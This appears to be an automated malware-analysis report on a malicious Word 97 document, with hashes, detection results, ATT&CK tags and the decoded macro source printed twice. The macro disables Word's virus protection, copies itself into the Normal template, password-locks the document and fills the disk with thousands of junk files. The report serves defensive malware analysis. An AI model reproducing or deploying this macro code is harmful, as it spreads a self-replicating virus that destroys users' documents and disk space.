Office (OLE) malware analysis — malicious · 2a544356d0779354

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-08-09 14:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ece6e34dca2c836b6bc013ec7852a194 SHA-1: 4192b2391c6af07e15135a1bf2e06ffe42f3cfaa SHA-256: 2a544356d0779354c45be7204aed63ebc09b47a74ff0edd8b5e765a5c30f613f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to disable security features and alter application settings, including setting the registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\MVP to 'Enabled by Total Konfuzion'. It also manipulates application properties like the caption and user information, suggesting an attempt to disguise its malicious nature. The macro's actions indicate it is designed to facilitate the execution of further malicious code.

Heuristics 3

ClamAV: Doc.Trojan.Chameleon-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Chameleon-13
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10696 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10696 bytes
SHA-256: `77d53a2247974e5062c4320e8fae2bb21fcf05740ce533d0524669b55df8a857`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Dim b, mfm, fn, mi, ma, cfn If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then With Options .VirusProtection = (Rnd * 0) .SaveNormalPrompt = (Rnd * 0) .ConfirmConversions = (Rnd * 0) .SavePropertiesPrompt = (Rnd * 0) .BlueScreen = (Rnd * 0) + 1 End With CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0) CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0) CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0) With Application .Caption = "Micro$oft Matrix" .UserName = "Total Konfuzion" .UserInitials = "TK" .UserAddress = "W97M/Matrix" & vbCr & "The Matrix has you." End With With Selection .HomeKey Unit:=wdStory .EndKey Unit:=wdStory, Extend:=wdExtend .Delete Unit:=wdCharacter, Count:=1 .ParagraphFormat.Alignment = wdAlignParagraphCenter .Font.Name = "Arial" .Font.Bold = (Rnd * 0) + 1 .Font.Size = 20 .Font.Animation = wdAnimationShimmer .TypeText Text:="The Matrix has you." For b = 1 To 7 .TypeParagraph Next b .Font.Bold = (Rnd * 0) .Font.Italic = (Rnd * 0) + 1 .Font.Size = 8 .Font.Animation = wdAnimationNone .TypeText Text:="Follow the white rabbit." .Font.Italic = (Rnd * 0) For b = 1 To 3 .TypeParagraph Next b .Font.Bold = (Rnd * 0) + 1 .TypeText Text:="()...()" .TypeParagraph .TypeText Text:="( ' = ' )" .TypeParagraph .TypeText Text:="(''')(''')" End With Selection.HomeKey Unit:=wdStory If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Set d = i.VBProject.VBComponents.Item(1).CodeModule d.DeleteLines 1, d.CountOfLines d.AddFromString Vx With ActiveDocument .ReadOnlyRecommended = (Rnd * 0) + 1 .Password = "ashley" .WritePassword = "ashley" End If ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument mfn = (Rnd * 0) fn = FreeFile For mi = 1 To 50000 mfn = mfn + 1 Open "C:\Windows\System\Matrix" & mfn & ".sys" For Output As #fn For ma = 1 To 100000 Print #fn, "The Matrix has you." Next ma Close #fn Next mi End If ' W97M/Matrix ' by: Total Konfuzion ' Are YOU looking for it !!? End Sub ' Processing file: /opt/analyzer/scan_staging/e6461e442441471aa880a61d2cf20efd.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 5294 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' Dim ' VarDefn B ' VarDefn mfm ' VarDefn fn ' VarDefn mi ' VarDefn ma ' VarDefn cfn ' Line #3: ' LitStr 0x0000 "" ' LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion" ' LitStr 0x0003 "MVP" ' Ld System ' ArgsMemLd PrivateProfileString 0x0003 ' LitStr 0x001A "Enabled by Total Konfuzion" ' Ne ' IfBlock ' Line #4: ' StartWithExp ... (truncated)

SHA-256: 77d53a2247974e5062c4320e8fae2bb21fcf05740ce533d0524669b55df8a857

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    Dim b, mfm, fn, mi, ma, cfn
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
            .BlueScreen = (Rnd * 0) + 1
        End With
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
        With Application
            .Caption = "Micro$oft Matrix"
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = "W97M/Matrix" & vbCr & "The Matrix has you."
        End With
        With Selection
            .HomeKey Unit:=wdStory
            .EndKey Unit:=wdStory, Extend:=wdExtend
            .Delete Unit:=wdCharacter, Count:=1
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Font.Name = "Arial"
            .Font.Bold = (Rnd * 0) + 1
            .Font.Size = 20
            .Font.Animation = wdAnimationShimmer
            .TypeText Text:="The Matrix has you."
            For b = 1 To 7
                .TypeParagraph
            Next b
            .Font.Bold = (Rnd * 0)
            .Font.Italic = (Rnd * 0) + 1
            .Font.Size = 8
            .Font.Animation = wdAnimationNone
            .TypeText Text:="Follow the white rabbit."
            .Font.Italic = (Rnd * 0)
            For b = 1 To 3
                .TypeParagraph
            Next b
            .Font.Bold = (Rnd * 0) + 1
            .TypeText Text:="()...()"
            .TypeParagraph
            .TypeText Text:="( ' = ' )"
            .TypeParagraph
            .TypeText Text:="(''')(''')"
        End With
        Selection.HomeKey Unit:=wdStory
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        With ActiveDocument
            .ReadOnlyRecommended = (Rnd * 0) + 1
            .Password = "ashley"
            .WritePassword = "ashley"
        End If
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
        mfn = (Rnd * 0)
        fn = FreeFile
        For mi = 1 To 50000
            mfn = mfn + 1
            Open "C:\Windows\System\Matrix" & mfn & ".sys" For Output As #fn
                For ma = 1 To 100000
                    Print #fn, "The Matrix has you."
                Next ma
            Close #fn
        Next mi
    End If
' W97M/Matrix
'   by: Total Konfuzion
' Are YOU looking for it !!?
End Sub


' Processing file: /opt/analyzer/scan_staging/e6461e442441471aa880a61d2cf20efd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5294 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn B
' 	VarDefn mfm
' 	VarDefn fn
' 	VarDefn mi
' 	VarDefn ma
' 	VarDefn cfn
' Line #3:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0003 "MVP"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001A "Enabled by Total Konfuzion"
' 	Ne 
' 	IfBlock 
' Line #4:
' 	StartWithExp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.